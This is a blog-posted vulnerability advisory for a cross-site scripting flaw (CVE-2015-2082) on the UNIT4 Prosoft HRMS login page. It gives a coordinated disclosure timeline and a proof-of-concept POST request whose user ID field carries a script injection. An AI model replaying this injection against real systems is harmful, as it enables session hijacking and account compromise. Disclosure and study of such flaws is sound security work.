CVE-2015-2082 – UNIT4 Prosoft HRMS XSS Vulnerability

# Vulnerability type: Cross-site Scripting
# Vendor: http://www.unit4.com/
# Product: UNIT4 Prosoft HRMS
# Product site: http://www.unit4apac.com/products/prosofthrms
# Affected version: =< 8.14.230.47
# CVE-ID: CVE-2015-2082
# Credit: Jerold Hoong & Edric Teo
# PROOF OF CONCEPT
The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting.

POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyO
Q9kFgQCAQ9kFgICAQ8WAh4EVGV4dAVfPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBo
cmVmPSJBcHBfVGhlbWVzL1BTRGVmYXVsdC9JbWFnZXMvRmF2SWNvbi5pY28iIHR5cGU
9ImltYWdlL3gtaWNvbiIgLz5kAgMPZBYKAgEPZBYCAgMPDxYCHgdWaXNpYmxlaGRkAg
MPZBYCZg8PFgIfAAU0VGhlIGNvZGUgY29udGFpbnMgaW52YWxpZCBjaGFyYWN0ZXJzL
iAoVVNSLlVzZXJDb2RlKWRkAgUPDxYCHwAFBlY4IFVBVGRkAgcPZBYWAgEPZBYEAgEP
DxYCHwAFC0NsaWVudCBDb2RlZGQCBQ8PFgIeDEVycm9yTWVzc2FnZQUIUmVxdWlyZWR
kZAIDD2QWBAIBDw8WAh8ABQZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QWBAIBDw8WAh8ABQ
hEYXRhYmFzZWRkAgUPDxYCHwIFCFJlcXVpcmVkZGQCBw9kFgQCAQ8PFgIfAAULTERBU
CBEb21haW5kZAIDDxBkZBYAZAIJDw8WAh8ABQdVc2VyIElEZGQCCw8PZBYCHgxhdXRv
Y29tcGxldGUFA29mZmQCDQ8PFgIfAgUIUmVxdWlyZWRkZAIPDw8WAh8ABQhQYXNzd29
yZGRkAhMPDxYCHwFoZBYEAgEPDxYCHwAFCExhbmd1YWdlZGQCAw8QZGQWAGQCFQ8PFg
IfAAUVRm9yZ290IHlvdXIgcGFzc3dvcmQ%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyF
TQgKAAh4FV2lkdGgbAAAAAADAUkABAAAAZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcH
lyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQdGUgTHRkLiBBbGwgUmlna
HRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3yxmGD
Z9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQ
K1qbSRCwLWxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E
%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&txtPassword=&btnSignIn=S
ign+In

# TIMELINE
- 28/10/2014: Vulnerability found
- 04/11/2014: Vendor informed
- 04/11/2014: Vendor responded
- 30/11/2014: Vendor fixed the issue
- 14/02/2015: Public disclosure

prosoft_hrms prosoft_hrms_2
References:

Advertisements

One thought on “CVE-2015-2082 – UNIT4 Prosoft HRMS XSS Vulnerability

  1. Pingback: [CVE-2015-2082] UNIT4 Prosoft HRMS XSS Vulnerability | Edric Teo

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s